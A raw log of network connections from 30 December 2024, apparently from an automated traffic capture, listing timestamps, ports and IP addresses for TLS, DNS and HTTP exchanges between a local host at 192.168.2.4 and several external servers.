                                                                  Dec 30, 2024 22:42:20.882996082 CET49758443192.168.2.4104.18.95.41
                                                                  Dec 30, 2024 22:42:20.887244940 CET49758443192.168.2.4104.18.95.41
                                                                  Dec 30, 2024 22:42:20.887255907 CET44349758104.18.95.41192.168.2.4
                                                                  Dec 30, 2024 22:42:20.977849960 CET49764443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:20.977893114 CET44349764104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:20.977965117 CET49764443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:20.978293896 CET49764443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:20.978307962 CET44349764104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:21.022527933 CET49765443192.168.2.4104.18.95.41
                                                                  Dec 30, 2024 22:42:21.022558928 CET44349765104.18.95.41192.168.2.4
                                                                  Dec 30, 2024 22:42:21.022655010 CET49765443192.168.2.4104.18.95.41
                                                                  Dec 30, 2024 22:42:21.022897959 CET49765443192.168.2.4104.18.95.41
                                                                  Dec 30, 2024 22:42:21.022908926 CET44349765104.18.95.41192.168.2.4
                                                                  Dec 30, 2024 22:42:21.442378998 CET44349764104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:21.442723036 CET49764443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:21.442751884 CET44349764104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:21.443042994 CET44349764104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:21.443371058 CET49764443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:21.443430901 CET44349764104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:21.443527937 CET49764443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:21.491322994 CET44349764104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:21.507323027 CET44349765104.18.95.41192.168.2.4
                                                                  Dec 30, 2024 22:42:21.507555962 CET49765443192.168.2.4104.18.95.41
                                                                  Dec 30, 2024 22:42:21.507581949 CET44349765104.18.95.41192.168.2.4
                                                                  Dec 30, 2024 22:42:21.507848024 CET44349765104.18.95.41192.168.2.4
                                                                  Dec 30, 2024 22:42:21.508255959 CET49765443192.168.2.4104.18.95.41
                                                                  Dec 30, 2024 22:42:21.508296967 CET44349765104.18.95.41192.168.2.4
                                                                  Dec 30, 2024 22:42:21.508362055 CET49765443192.168.2.4104.18.95.41
                                                                  Dec 30, 2024 22:42:21.555325985 CET44349765104.18.95.41192.168.2.4
                                                                  Dec 30, 2024 22:42:21.586766958 CET44349764104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:21.586822987 CET44349764104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:21.586882114 CET49764443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:21.587865114 CET49764443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:21.587881088 CET44349764104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:21.591387033 CET49766443192.168.2.4104.18.95.41
                                                                  Dec 30, 2024 22:42:21.591440916 CET44349766104.18.95.41192.168.2.4
                                                                  Dec 30, 2024 22:42:21.591519117 CET49766443192.168.2.4104.18.95.41
                                                                  Dec 30, 2024 22:42:21.591732979 CET49766443192.168.2.4104.18.95.41
                                                                  Dec 30, 2024 22:42:21.591747046 CET44349766104.18.95.41192.168.2.4
                                                                  Dec 30, 2024 22:42:21.640094042 CET49767443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:21.640191078 CET44349767104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:21.640273094 CET49767443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:21.640475988 CET49767443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:21.640510082 CET44349767104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:21.653934002 CET44349765104.18.95.41192.168.2.4
                                                                  Dec 30, 2024 22:42:21.653991938 CET44349765104.18.95.41192.168.2.4
                                                                  Dec 30, 2024 22:42:21.654047012 CET49765443192.168.2.4104.18.95.41
                                                                  Dec 30, 2024 22:42:21.654437065 CET49765443192.168.2.4104.18.95.41
                                                                  Dec 30, 2024 22:42:21.654453039 CET44349765104.18.95.41192.168.2.4
                                                                  Dec 30, 2024 22:42:22.119638920 CET44349766104.18.95.41192.168.2.4
                                                                  Dec 30, 2024 22:42:22.120007038 CET49766443192.168.2.4104.18.95.41
                                                                  Dec 30, 2024 22:42:22.120028973 CET44349766104.18.95.41192.168.2.4
                                                                  Dec 30, 2024 22:42:22.120351076 CET44349766104.18.95.41192.168.2.4
                                                                  Dec 30, 2024 22:42:22.120670080 CET49766443192.168.2.4104.18.95.41
                                                                  Dec 30, 2024 22:42:22.120733023 CET44349766104.18.95.41192.168.2.4
                                                                  Dec 30, 2024 22:42:22.120815039 CET49766443192.168.2.4104.18.95.41
                                                                  Dec 30, 2024 22:42:22.128123045 CET44349767104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:22.128350973 CET49767443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:22.128395081 CET44349767104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:22.128741026 CET44349767104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:22.129024029 CET49767443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:22.129098892 CET44349767104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:22.129129887 CET49767443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:22.167329073 CET44349766104.18.95.41192.168.2.4
                                                                  Dec 30, 2024 22:42:22.170283079 CET49767443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:22.170303106 CET44349767104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:22.273458004 CET44349767104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:22.273529053 CET44349767104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:22.273591042 CET44349767104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:22.273597956 CET49767443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:22.273643970 CET49767443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:22.274221897 CET49767443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:22.274255037 CET44349767104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:22.293498039 CET44349766104.18.95.41192.168.2.4
                                                                  Dec 30, 2024 22:42:22.293567896 CET44349766104.18.95.41192.168.2.4
                                                                  Dec 30, 2024 22:42:22.293653011 CET49766443192.168.2.4104.18.95.41
                                                                  Dec 30, 2024 22:42:22.294871092 CET49766443192.168.2.4104.18.95.41
                                                                  Dec 30, 2024 22:42:22.294886112 CET44349766104.18.95.41192.168.2.4
                                                                  Dec 30, 2024 22:42:22.453063011 CET49768443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:22.453110933 CET44349768104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:22.453205109 CET49768443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:22.453510046 CET49768443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:22.453524113 CET44349768104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:22.906272888 CET44349768104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:22.952349901 CET49768443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:22.961319923 CET49768443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:22.961330891 CET44349768104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:22.961730003 CET44349768104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:23.003925085 CET49768443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:23.004034996 CET44349768104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:23.004153967 CET49768443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:23.006953001 CET49768443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:23.006982088 CET44349768104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:23.007057905 CET49768443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:23.007066011 CET44349768104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:23.227979898 CET44349768104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:23.228018045 CET44349768104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:23.228050947 CET44349768104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:23.228065014 CET49768443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:23.228077888 CET44349768104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:23.228089094 CET44349768104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:23.228131056 CET44349768104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:23.228133917 CET49768443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:23.228141069 CET44349768104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:23.228173018 CET49768443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:23.228421926 CET44349768104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:23.228458881 CET49768443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:23.228477001 CET44349768104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:23.232772112 CET44349768104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:23.232794046 CET44349768104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:23.232822895 CET49768443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:23.232825041 CET44349768104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:23.232836008 CET44349768104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:23.232871056 CET49768443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:23.314363956 CET44349768104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:23.314407110 CET44349768104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:23.314431906 CET44349768104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:23.314470053 CET44349768104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:23.314510107 CET49768443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:23.314529896 CET44349768104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:23.314543009 CET44349768104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:23.314552069 CET49768443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:23.314596891 CET49768443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:23.314975023 CET49768443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:23.314991951 CET44349768104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:23.333983898 CET49769443192.168.2.4104.18.95.41
                                                                  Dec 30, 2024 22:42:23.334043980 CET44349769104.18.95.41192.168.2.4
                                                                  Dec 30, 2024 22:42:23.334166050 CET49769443192.168.2.4104.18.95.41
                                                                  Dec 30, 2024 22:42:23.334377050 CET49769443192.168.2.4104.18.95.41
                                                                  Dec 30, 2024 22:42:23.334393024 CET44349769104.18.95.41192.168.2.4
                                                                  Dec 30, 2024 22:42:23.790318966 CET44349769104.18.95.41192.168.2.4
                                                                  Dec 30, 2024 22:42:23.790726900 CET49769443192.168.2.4104.18.95.41
                                                                  Dec 30, 2024 22:42:23.790781975 CET44349769104.18.95.41192.168.2.4
                                                                  Dec 30, 2024 22:42:23.791110992 CET44349769104.18.95.41192.168.2.4
                                                                  Dec 30, 2024 22:42:23.791511059 CET49769443192.168.2.4104.18.95.41
                                                                  Dec 30, 2024 22:42:23.791585922 CET44349769104.18.95.41192.168.2.4
                                                                  Dec 30, 2024 22:42:23.791764975 CET49769443192.168.2.4104.18.95.41
                                                                  Dec 30, 2024 22:42:23.839327097 CET44349769104.18.95.41192.168.2.4
                                                                  Dec 30, 2024 22:42:23.936821938 CET44349769104.18.95.41192.168.2.4
                                                                  Dec 30, 2024 22:42:23.936887980 CET44349769104.18.95.41192.168.2.4
                                                                  Dec 30, 2024 22:42:23.936954975 CET49769443192.168.2.4104.18.95.41
                                                                  Dec 30, 2024 22:42:23.937958956 CET49769443192.168.2.4104.18.95.41
                                                                  Dec 30, 2024 22:42:23.938004017 CET44349769104.18.95.41192.168.2.4
                                                                  Dec 30, 2024 22:42:24.266987085 CET804972384.201.210.36192.168.2.4
                                                                  Dec 30, 2024 22:42:24.267142057 CET4972380192.168.2.484.201.210.36
                                                                  Dec 30, 2024 22:42:24.267214060 CET4972380192.168.2.484.201.210.36
                                                                  Dec 30, 2024 22:42:24.272063971 CET804972384.201.210.36192.168.2.4
                                                                  Dec 30, 2024 22:42:24.770983934 CET44349737142.250.186.132192.168.2.4
                                                                  Dec 30, 2024 22:42:24.771068096 CET44349737142.250.186.132192.168.2.4
                                                                  Dec 30, 2024 22:42:24.771241903 CET49737443192.168.2.4142.250.186.132
                                                                  Dec 30, 2024 22:42:26.718007088 CET49737443192.168.2.4142.250.186.132
                                                                  Dec 30, 2024 22:42:26.718049049 CET44349737142.250.186.132192.168.2.4
                                                                  Dec 30, 2024 22:42:28.442217112 CET5847753192.168.2.41.1.1.1
                                                                  Dec 30, 2024 22:42:28.448210001 CET53584771.1.1.1192.168.2.4
                                                                  Dec 30, 2024 22:42:28.448297024 CET5847753192.168.2.41.1.1.1
                                                                  Dec 30, 2024 22:42:28.453830004 CET53584771.1.1.1192.168.2.4
                                                                  Dec 30, 2024 22:42:28.897582054 CET5847753192.168.2.41.1.1.1
                                                                  Dec 30, 2024 22:42:28.902522087 CET53584771.1.1.1192.168.2.4
                                                                  Dec 30, 2024 22:42:28.902632952 CET5847753192.168.2.41.1.1.1
                                                                  Dec 30, 2024 22:42:30.660146952 CET58479443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:30.660219908 CET44358479104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:30.660322905 CET58479443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:30.660620928 CET58479443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:30.660636902 CET44358479104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:31.112997055 CET44358479104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:31.113365889 CET58479443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:31.113399982 CET44358479104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:31.113718987 CET44358479104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:31.114043951 CET58479443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:31.114099026 CET44358479104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:31.114209890 CET58479443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:31.114295006 CET58479443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:31.114320040 CET44358479104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:31.114398956 CET58479443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:31.114412069 CET44358479104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:31.363647938 CET44358479104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:31.363723993 CET44358479104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:31.363746881 CET44358479104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:31.363785982 CET58479443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:31.363820076 CET44358479104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:31.363833904 CET44358479104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:31.363873005 CET58479443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:31.363903999 CET58479443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:31.364496946 CET58479443192.168.2.4104.18.94.41
                                                                  Dec 30, 2024 22:42:31.364516973 CET44358479104.18.94.41192.168.2.4
                                                                  Dec 30, 2024 22:42:31.392832041 CET58480443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:31.392870903 CET44358480188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:31.392946959 CET58480443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:31.393762112 CET58480443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:31.393779039 CET44358480188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:31.404742002 CET58481443192.168.2.4104.18.95.41
                                                                  Dec 30, 2024 22:42:31.404751062 CET44358481104.18.95.41192.168.2.4
                                                                  Dec 30, 2024 22:42:31.404835939 CET58481443192.168.2.4104.18.95.41
                                                                  Dec 30, 2024 22:42:31.405137062 CET58481443192.168.2.4104.18.95.41
                                                                  Dec 30, 2024 22:42:31.405148029 CET44358481104.18.95.41192.168.2.4
                                                                  Dec 30, 2024 22:42:31.870033979 CET44358480188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:31.870747089 CET58480443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:31.870760918 CET44358480188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:31.871042967 CET44358480188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:31.874679089 CET58480443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:31.874737024 CET44358480188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:31.874892950 CET58480443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:31.874931097 CET58480443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:31.874954939 CET44358480188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:31.898417950 CET44358481104.18.95.41192.168.2.4
                                                                  Dec 30, 2024 22:42:31.899194956 CET58481443192.168.2.4104.18.95.41
                                                                  Dec 30, 2024 22:42:31.899204016 CET44358481104.18.95.41192.168.2.4
                                                                  Dec 30, 2024 22:42:31.899713993 CET44358481104.18.95.41192.168.2.4
                                                                  Dec 30, 2024 22:42:31.900670052 CET58481443192.168.2.4104.18.95.41
                                                                  Dec 30, 2024 22:42:31.900749922 CET44358481104.18.95.41192.168.2.4
                                                                  Dec 30, 2024 22:42:31.901257038 CET58481443192.168.2.4104.18.95.41
                                                                  Dec 30, 2024 22:42:31.943325043 CET44358481104.18.95.41192.168.2.4
                                                                  Dec 30, 2024 22:42:32.041213989 CET44358480188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:32.041280031 CET44358480188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:32.041309118 CET44358480188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:32.041327000 CET44358480188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:32.041347980 CET58480443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:32.041357040 CET44358480188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:32.041389942 CET58480443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:32.041410923 CET44358480188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:32.041455030 CET58480443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:32.044214010 CET58480443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:32.044225931 CET44358480188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:32.062840939 CET44358481104.18.95.41192.168.2.4
                                                                  Dec 30, 2024 22:42:32.062927008 CET44358481104.18.95.41192.168.2.4
                                                                  Dec 30, 2024 22:42:32.062994003 CET58481443192.168.2.4104.18.95.41
                                                                  Dec 30, 2024 22:42:32.229614019 CET58481443192.168.2.4104.18.95.41
                                                                  Dec 30, 2024 22:42:32.229630947 CET44358481104.18.95.41192.168.2.4
                                                                  Dec 30, 2024 22:42:32.234476089 CET58482443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:32.234491110 CET44358482188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:32.234581947 CET58482443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:32.234854937 CET58483443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:32.234900951 CET44358483188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:32.234956980 CET58483443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:32.235275030 CET58482443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:32.235286951 CET44358482188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:32.235534906 CET58483443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:32.235552073 CET44358483188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:32.238105059 CET58484443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:32.238140106 CET44358484188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:32.238197088 CET58484443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:32.238492966 CET58484443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:32.238502026 CET44358484188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:32.710055113 CET44358483188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:32.710562944 CET58483443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:32.710594893 CET44358483188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:32.711102009 CET44358483188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:32.711431026 CET58483443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:32.711525917 CET44358483188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:32.711602926 CET58483443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:32.711663961 CET58483443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:32.711689949 CET44358483188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:32.713562012 CET44358482188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:32.713774920 CET58482443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:32.713799953 CET44358482188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:32.713861942 CET44358484188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:32.714029074 CET58484443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:32.714047909 CET44358484188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:32.714095116 CET44358482188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:32.714436054 CET58482443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:32.714495897 CET44358482188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:32.715502024 CET44358484188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:32.715574026 CET58484443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:32.716383934 CET58484443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:32.716458082 CET44358484188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:32.716465950 CET58484443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:32.716516972 CET58484443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:32.716526985 CET44358484188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:32.716535091 CET58484443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:32.716567993 CET58484443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:32.717138052 CET58485443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:32.717195034 CET44358485188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:32.717257023 CET58485443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:32.717492104 CET58485443192.168.2.4188.114.97.3
                                                                  Dec 30, 2024 22:42:32.717511892 CET44358485188.114.97.3192.168.2.4
                                                                  Dec 30, 2024 22:42:32.762605906 CET58482443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:33.108159065 CET44358483188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:33.108268023 CET44358483188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:33.108308077 CET44358483188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:33.108314991 CET58483443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:33.108349085 CET44358483188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:33.108386040 CET58483443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:33.108392954 CET44358483188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:33.108431101 CET44358483188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:33.108465910 CET58483443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:33.108467102 CET44358483188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:33.108489037 CET44358483188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:33.108522892 CET58483443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:33.108529091 CET44358483188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:33.108624935 CET44358483188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:33.108666897 CET58483443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:33.163227081 CET58486443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:33.163299084 CET44358486188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:33.163521051 CET58486443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:33.163914919 CET58487443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:33.164014101 CET44358487188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:33.164093971 CET58487443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:33.167802095 CET58488443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:33.167855978 CET44358488188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:33.167968988 CET58488443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:33.168154001 CET58489443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:33.168235064 CET44358489188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:33.168292046 CET58489443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:33.170531988 CET58482443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:33.170877934 CET58486443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:33.170898914 CET44358486188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:33.171405077 CET58487443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:33.171433926 CET44358487188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:33.171741962 CET58488443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:33.171755075 CET44358488188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:33.172027111 CET58489443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:33.172060013 CET44358489188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:33.173527956 CET58483443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:33.173561096 CET44358483188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:33.173877954 CET58490443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:33.173886061 CET44358490188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:33.173948050 CET58490443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:33.175014973 CET58490443192.168.2.4188.114.96.3
                                                                  Dec 30, 2024 22:42:33.175023079 CET44358490188.114.96.3192.168.2.4
                                                                  Dec 30, 2024 22:42:33.184690952 CET58491443192.168.2.4151.101.130.137
                                                                  Dec 30, 2024 22:42:33.184741974 CET44358491151.101.130.137192.168.2.4
                                                                  Dec 30, 2024 22:42:33.184815884 CET58491443192.168.2.4151.101.130.137
                                                                  Dec 30, 2024 22:42:33.185038090 CET58491443192.168.2.4151.101.130.137
                                                                  Dec 30, 2024 22:42:33.185055017 CET44358491151.101.130.137192.168.2.4
                                                                  Dec 30, 2024 22:42:33.185399055 CET58492443192.168.2.4104.17.24.14
                                                                  Dec 30, 2024 22:42:33.185435057 CET44358492104.17.24.14192.168.2.4
                                                                  Dec 30, 2024 22:42:33.185498953 CET58492443192.168.2.4104.17.24.14
                                                                  Dec 30, 2024 22:42:33.185698032 CET58492443192.168.2.4104.17.24.14
                                                                  Dec 30, 2024 22:42:33.185713053 CET44358492104.17.24.14192.168.2.4
                                                                  Dec 30, 2024 22:42:33.187333107 CET58494443192.168.2.4104.18.10.207
                                                                  Dec 30, 2024 22:42:33.187345982 CET44358494104.18.10.207192.168.2.4
                                                                  Dec 30, 2024 22:42:33.187499046 CET58494443192.168.2.4104.18.10.207
                                                                  Dec 30, 2024 22:42:33.187741995 CET58495443192.168.2.4104.18.10.207
